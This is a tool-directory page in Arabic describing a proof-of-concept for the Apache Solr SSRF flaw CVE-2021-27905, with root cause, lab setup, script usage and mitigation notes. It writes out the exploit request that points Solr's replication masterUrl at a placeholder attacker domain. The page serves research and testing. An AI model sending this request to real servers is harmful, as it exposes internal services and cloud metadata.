Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-27905 — Apache Solr < 8.8.2 تزوير الطلبات من جانب الخادم | Kitploit
أدوات/GitHubGitHub/rizzziom/cve-2021-27905
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubrizzziom/cve-2021-27905

CVE-2021-27905

Apache Solr < 8.8.2 تزوير الطلبات من جانب الخادم

عرض المستودع
2منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2021-27905

الرقمالعنوان
1نظرة عامة
2السبب الجذري
3إثبات المفهوم
4التخفيف (8.8.2+)
5المراجع

لأغراض تعليمية وبحثية فقط. لا تستخدم هذا الكود على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. لست مسؤولًا عن أي إساءة استخدام.

نظرة عامة

هذه ثغرة من نوع تزوير الطلبات من جانب الخادم (Server Side Request Forgery - SSRF) تؤثر على Apache Solr (الإصدارات الأقدم من 8.8.2)، وتتيح للمهاجمين عن بُعد إرسال طلبات HTTP تعسفية إلى أنظمة داخلية أو خارجية عبر معامل masterUrl في معالج النسخ المتماثل (replication handler)، مما قد يكشف الخدمات الداخلية أو بيانات وصفية حساسة في السحابة.

الإصدارات المتأثرة : جميع الإصدارات السابقة للإصدار 8.8.2 (7.0.0 - 7.7.3, 8.0.0 - 8.8.1)

السبب الجذري

تتيح آلية النسخ المتماثل في Solr للنسخة «التابعة» (replica) جلب ملفات الفهرس من «الرئيسي/القائد» (master/leader) عبر تحديد معامل masterUrl أو leaderUrl. لا يتم التحقق من صحة العنوان المشار إليه عبر هذا المعامل بشكل صحيح في إصدارات Apache Solr المتأثرة. وبالتالي، قد تسمح للمهاجمين بجعل الخادم يتصل بمورد بعيد يختارونه.

مسار الثغرة

  • يرسل المهاجم طلبًا إلى نقطة نهاية مثل:
root@kitploit:~
/solr/<CORE_NAME>/replication?command=fetchindex&masterUrl=http://<ATTACKER_DOMAIN>

ReplicationHandler الخاص بـ Solr سيقوم بما يلي:

  1. قبول الطلب.
  2. استخدام masterUrl المقدَّم لتنزيل بيانات الفهرس.
  3. إجراء استدعاء HTTP داخلي إلى ذلك العنوان.

إثبات المفهوم

إعداد المختبر

  • يمكن إعداد مختبر محليًا باستخدام docker:
root@kitploit:~
$ cd lab
$ docker compose up -d

# verify accessibility
$ curl http://127.0.0.1:8983/solr
  • التنظيف
root@kitploit:~
$ docker compose down

الاستغلال

  • إعداد بيئة افتراضية:
root@kitploit:~
# for windows
$ python -m venv <NAME>
$ .\<NAME>\Scripts\activate
# for linux
$ python3 -m venv <NAME>
$ source ./<NAME>/scripts/activate
  • تثبيت المتطلبات:
root@kitploit:~
$ pip install -r requirements.txt
  • تشغيل cve-2021-27905.py
root@kitploit:~
$ python3 cve-2021-27905.py --target <TARGET> --payload <SSRF_PAYLOAD>

SSRF PoC

التخفيف (8.8.2+)

تم تحديث ReplicationHandler في Solr ليقوم بما يلي:

  • التحقق من أن masterUrl/leaderUrl لا يشيران إلا إلى مضيفين معتمدين.
  • تقييد مخططات العناوين (URL schemes) المقبولة (http، https فقط).
  • تعزيز ميزات البث عن بُعد (remote streaming).
  • التوصية للمسؤولين بتأمين /replication بالمصادقة أو إزالته بالكامل إذا لم يكن قيد الاستخدام.

المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2021-27905
  • https://lists.apache.org/thread/90kct018gfdnvh9wh5xvt0grm9jk2l80

تنزيل الأداة